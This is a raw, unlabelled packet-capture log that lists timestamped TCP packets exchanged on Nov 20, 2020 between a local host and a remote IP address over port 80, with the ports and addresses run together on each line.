                                                                                                                                                Nov 20, 2020 11:23:47.666014910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666038036 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666048050 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666071892 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666081905 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666105032 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666117907 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666130066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666160107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666160107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666198015 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666212082 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666233063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666237116 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666268110 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666281939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666301966 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666320086 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666336060 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666348934 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666371107 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666388988 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666405916 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666420937 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666449070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666452885 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666487932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666501045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666522026 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666527033 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666555882 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666568995 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666590929 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666610956 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666625023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.666636944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.666665077 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.669146061 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.670757055 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670782089 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670799971 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670815945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670835018 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670851946 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.670912981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.670955896 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.677650928 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885488033 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885545969 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885585070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885624886 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885657072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885664940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885693073 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885699034 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885713100 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885756969 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885795116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885807991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885828018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885834932 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885850906 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885875940 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885915995 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885951996 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885952950 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.885963917 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885971069 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.885993004 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886001110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886040926 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886056900 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886084080 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886109114 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886122942 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886157990 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886166096 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886205912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886234045 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886245966 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886251926 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886301041 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886307001 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886312008 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886369944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886435032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886446953 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886487961 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886495113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886528969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886533976 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.886579037 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.886600018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887670994 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887762070 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887806892 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887851000 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887878895 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887924910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887943983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.887964010 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.887995958 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888015985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888019085 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888072014 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888078928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888140917 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888147116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888206005 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888210058 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888252020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888267040 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888292074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888330936 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888339043 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888370037 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888384104 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888401985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888408899 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888431072 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888477087 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888482094 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888520002 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888573885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888596058 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888613939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888632059 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.888649940 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.888698101 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.889251947 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.895968914 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896008968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896044970 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896080971 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896224022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896255016 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896279097 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896282911 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896300077 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896313906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:47.896339893 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.896365881 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.900839090 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:47.901973009 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105305910 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105372906 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105452061 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105492115 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105528116 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105566978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105587006 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105603933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.105623960 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105629921 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105634928 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.105662107 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106247902 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106302977 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106331110 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106344938 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106353998 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106383085 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106412888 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106422901 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106461048 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106467962 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106482983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106498003 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106524944 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106535912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106555939 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106574059 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106601954 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106621027 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106646061 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106671095 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106698036 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106709003 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106740952 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106748104 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106772900 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106786966 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106810093 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106825113 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106863976 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106863976 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106900930 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106901884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106940985 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106950045 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.106976032 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.106993914 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.107012987 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.107032061 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.107047081 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.107070923 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.107088089 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.107109070 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.107129097 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.107170105 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108309984 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108438969 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108586073 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108658075 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108725071 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108788967 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108802080 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108840942 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108870983 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108880043 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108887911 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108917952 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108932018 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.108966112 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.108967066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109008074 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109026909 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109045029 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109066010 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109082937 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109097004 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109121084 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109127998 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109168053 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109181881 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109206915 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109225035 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109245062 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109260082 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109281063 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109297991 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109319925 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109333992 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109359026 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109373093 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109416008 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109431982 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109481096 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109520912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109528065 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109558105 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109574080 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109596014 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109603882 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109635115 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109653950 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109673023 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109682083 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109709978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109740019 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109778881 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109780073 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109800100 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109817982 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109833002 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109855890 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109860897 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109894037 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109913111 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109934092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109949112 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.109981060 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.109987020 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.110023975 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.110038042 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.110075951 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.119321108 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119360924 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119394064 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119420052 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.119424105 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119453907 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119486094 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.119517088 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.119524002 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.119528055 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.119539976 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.120748997 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.125830889 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.325786114 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.325927973 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.325932026 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326009035 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326100111 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326144934 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326224089 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326263905 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326276064 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326333046 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326436996 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326483011 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326503038 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326534986 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326555967 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326592922 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326611042 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326634884 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326692104 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326704979 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326719999 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326741934 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326771021 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326796055 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                Nov 20, 2020 11:23:48.326821089 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326860905 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                Nov 20, 2020 11:23:48.326881886 CET4916580192.168.2.22103.125.191.5
